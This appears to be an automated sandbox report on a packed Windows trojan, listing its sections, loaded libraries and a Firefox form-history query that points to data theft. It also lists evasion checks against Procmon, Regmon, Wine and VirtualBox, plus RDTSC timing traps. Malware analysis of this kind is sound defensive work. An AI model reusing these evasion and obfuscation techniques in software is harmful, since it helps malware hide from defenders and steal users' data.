              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CAB8640_2_00CAB864
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6C1FE0_2_00D6C1FE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C0D1920_2_00C0D192
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7B1510_2_00D7B151
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D509700_2_00D50970
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D672C00_2_00D672C0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C9CA030_2_00C9CA03
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D71A0D0_2_00D71A0D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DFFA3D0_2_00DFFA3D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D623510_2_00D62351
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D21B120_2_00D21B12
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D77CDB0_2_00D77CDB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D68CE60_2_00D68CE6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D72C020_2_00D72C02
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF95D40_2_00DF95D4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C5CDDD0_2_00C5CDDD
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D63DB70_2_00D63DB7
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D746850_2_00D74685
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C7FE5C0_2_00C7FE5C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6F61B0_2_00D6F61B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D657FA0_2_00D657FA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6A7FA0_2_00D6A7FA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D17F390_2_00D17F39
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 009B4A60 appears 316 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: lfcefhqr ZLIB complexity 0.9947995965286236
              Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
              Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D3A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_009D3A50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CCAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_009CCAE0
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\S80LOU2M.htmJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exe, 00000000.00000002.1351848119.00000000010AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT fieldname, value FROM moz_formhistory;Q2
              Source: file.exeReversingLabs: Detection: 42%
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
              Source: file.exeStatic file information: File size 1787392 > 1048576
              Source: file.exeStatic PE information: Raw size of lfcefhqr is bigger than: 0x100000 < 0x19a800

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.9b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lfcefhqr:EW;phkznexg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lfcefhqr:EW;phkznexg:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_009D6390
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1b4812 should be: 0x1c1ada
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: lfcefhqr
              Source: file.exeStatic PE information: section name: phkznexg
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D7895 push ecx; ret 0_2_009D78A8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD20C8 push eax; mov dword ptr [esp], ecx0_2_00DD2128
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E540C1 push 3F7D772Bh; mov dword ptr [esp], ebp0_2_00E54188
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E540C1 push ebx; mov dword ptr [esp], ebp0_2_00E541A1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E428D9 push 71077330h; mov dword ptr [esp], edi0_2_00E4291E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E048B4 push 38C3E7F8h; mov dword ptr [esp], eax0_2_00E048F1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E350BB push 5E3DEAA6h; mov dword ptr [esp], esp0_2_00E351B1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E418BC push 2783155Fh; mov dword ptr [esp], edi0_2_00E418E3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBA086 push esi; ret 0_2_00DBA095
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E37091 push edx; mov dword ptr [esp], ebx0_2_00E37105
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E37091 push eax; mov dword ptr [esp], edx0_2_00E37116
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E8D091 push edx; mov dword ptr [esp], ecx0_2_00E8D0E7
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E8D091 push ecx; mov dword ptr [esp], ebx0_2_00E8D11F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E0006A push ebx; mov dword ptr [esp], esi0_2_00E00096
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0103B196 push esi; mov dword ptr [esp], edi0_2_0103B197
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E54849 push ecx; mov dword ptr [esp], edx0_2_00E54878
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CAB864 push 4D58C440h; mov dword ptr [esp], esi0_2_00CAB887
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CAB864 push 4AB86EE8h; mov dword ptr [esp], eax0_2_00CABA0C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CAB864 push 0BA8C087h; mov dword ptr [esp], esi0_2_00CABA38
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1785C push 4BB10B50h; mov dword ptr [esp], edi0_2_00E17884
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DE1860 push 39F1B199h; mov dword ptr [esp], ebp0_2_00DE189F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E359F9 push eax; mov dword ptr [esp], esi0_2_00E3590C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E8C9C9 push ebx; mov dword ptr [esp], 6BEA3395h0_2_00E8CA22
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E8C9C9 push 07A9E4A9h; mov dword ptr [esp], eax0_2_00E8CA35
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E8C9C9 push edx; mov dword ptr [esp], 7FAD7700h0_2_00E8CA54
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E8C9C9 push ecx; mov dword ptr [esp], ebp0_2_00E8CAB0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6C1FE push ebx; mov dword ptr [esp], edi0_2_00D6C210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6C1FE push 3B2C0967h; mov dword ptr [esp], ebx0_2_00D6C218
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6C1FE push 31AD5AA4h; mov dword ptr [esp], ebp0_2_00D6C233
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6C1FE push ebp; mov dword ptr [esp], edx0_2_00D6C25D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6C1FE push esi; mov dword ptr [esp], 7F6CA3E9h0_2_00D6C2E0
              Source: file.exeStatic PE information: section name: lfcefhqr entropy: 7.955184799443045

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_009D6390

              Malware Analysis System Evasion

              barindex
              Found evasive API chain (may stop execution after checking locale)
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-25967
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80F3A second address: D80F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 jbe 00007F99A1050D66h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D65305 second address: D65309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D65309 second address: D6530D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6530D second address: D65317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D65317 second address: D65323 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F99A1050D66h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D65323 second address: D65339 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A0E9ACEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D65339 second address: D6534D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jbe 00007F99A1050D66h 0x0000000c jns 00007F99A1050D66h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7FEAB second address: D7FEBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F99A0E9ACEAh 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7FEBB second address: D7FEC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnl 00007F99A1050D66h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8005B second address: D80063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D801C5 second address: D801CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D801CA second address: D801D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8294D second address: D82957 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F99A1050D66h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D82957 second address: D829BF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F99A0E9ACE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F99A0E9ACF6h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jbe 00007F99A0E9ACFDh 0x0000001c jmp 00007F99A0E9ACF7h 0x00000021 mov eax, dword ptr [eax] 0x00000023 jmp 00007F99A0E9ACF0h 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c jo 00007F99A0E9AD09h 0x00000032 push eax 0x00000033 push edx 0x00000034 jc 00007F99A0E9ACE6h 0x0000003a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D82A40 second address: D82AE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jc 00007F99A1050D75h 0x0000000f jmp 00007F99A1050D6Fh 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007F99A1050D68h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f sub ecx, dword ptr [ebp+122D2D5Fh] 0x00000035 push 00000000h 0x00000037 cmc 0x00000038 push EFEF1CA0h 0x0000003d jmp 00007F99A1050D74h 0x00000042 add dword ptr [esp], 1010E3E0h 0x00000049 mov cl, 04h 0x0000004b push 00000003h 0x0000004d mov ecx, dword ptr [ebp+122D1D48h] 0x00000053 or edx, 470C01AAh 0x00000059 push 00000000h 0x0000005b push esi 0x0000005c jnc 00007F99A1050D6Ch 0x00000062 pop edx 0x00000063 add cx, C54Ah 0x00000068 push 00000003h 0x0000006a jbe 00007F99A1050D6Ch 0x00000070 push C6E0F9EAh 0x00000075 push eax 0x00000076 push edx 0x00000077 push edi 0x00000078 ja 00007F99A1050D66h 0x0000007e pop edi 0x0000007f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D82AE7 second address: D82AF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F99A0E9ACE6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D82AF1 second address: D82B2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A1050D6Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 06E0F9EAh 0x00000012 mov ecx, dword ptr [ebp+122D2D2Bh] 0x00000018 sub esi, 65A054CFh 0x0000001e lea ebx, dword ptr [ebp+12456899h] 0x00000024 mov ecx, dword ptr [ebp+122D2C03h] 0x0000002a xor dword ptr [ebp+122D2F62h], ebx 0x00000030 xchg eax, ebx 0x00000031 push eax 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D82BBF second address: D82BCD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F99A0E9ACE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D82BCD second address: D82BD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D82BD1 second address: D82BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jnp 00007F99A0E9ACF4h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D82BE3 second address: D82BE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D82BE7 second address: D82C85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 pushad 0x00000008 jmp 00007F99A0E9ACF5h 0x0000000d mov dword ptr [ebp+122DBAA5h], ebx 0x00000013 popad 0x00000014 push 00000000h 0x00000016 sub dword ptr [ebp+122D1C53h], ecx 0x0000001c push F1075936h 0x00000021 push esi 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 jmp 00007F99A0E9ACEDh 0x0000002a popad 0x0000002b pop esi 0x0000002c add dword ptr [esp], 0EF8A74Ah 0x00000033 push esi 0x00000034 and cl, FFFFFFD5h 0x00000037 pop ecx 0x00000038 push 00000003h 0x0000003a mov cx, 749Fh 0x0000003e push 00000000h 0x00000040 mov cx, 4E03h 0x00000044 push 00000003h 0x00000046 pushad 0x00000047 jmp 00007F99A0E9ACF5h 0x0000004c add si, 0047h 0x00000051 popad 0x00000052 push BCF59CD8h 0x00000057 pushad 0x00000058 pushad 0x00000059 jmp 00007F99A0E9ACF7h 0x0000005e push eax 0x0000005f pop eax 0x00000060 popad 0x00000061 push edi 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D82D63 second address: D82D68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA4178 second address: DA417C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA417C second address: DA4182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D61DC5 second address: D61DDC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F99A0E9ACEBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D61DDC second address: D61DE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D61DE2 second address: D61DEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push esi 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D61DEF second address: D61E00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F99A1050D66h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D61E00 second address: D61E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA20D3 second address: DA20D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA20D9 second address: DA2109 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A0E9ACECh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c pushad 0x0000000d je 00007F99A0E9ACECh 0x00000013 pushad 0x00000014 jmp 00007F99A0E9ACEDh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA227C second address: DA2281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA23B7 second address: DA23C3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F99A0E9ACEEh 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA2808 second address: DA280E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA280E second address: DA2815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA2AD9 second address: DA2ADD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA2EE2 second address: DA2EFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99A0E9ACF9h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA2EFF second address: DA2F14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A1050D71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA3079 second address: DA3080 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA3080 second address: DA3098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F99A1050D6Fh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA3098 second address: DA309D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA37F2 second address: DA37FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F99A1050D66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA37FE second address: DA380A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F99A0E9ACEEh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA736F second address: DA7375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA7375 second address: DA73A2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F99A0E9ACEAh 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F99A0E9ACF8h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA73A2 second address: DA73A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA73A8 second address: DA73B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA73B4 second address: DA73B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
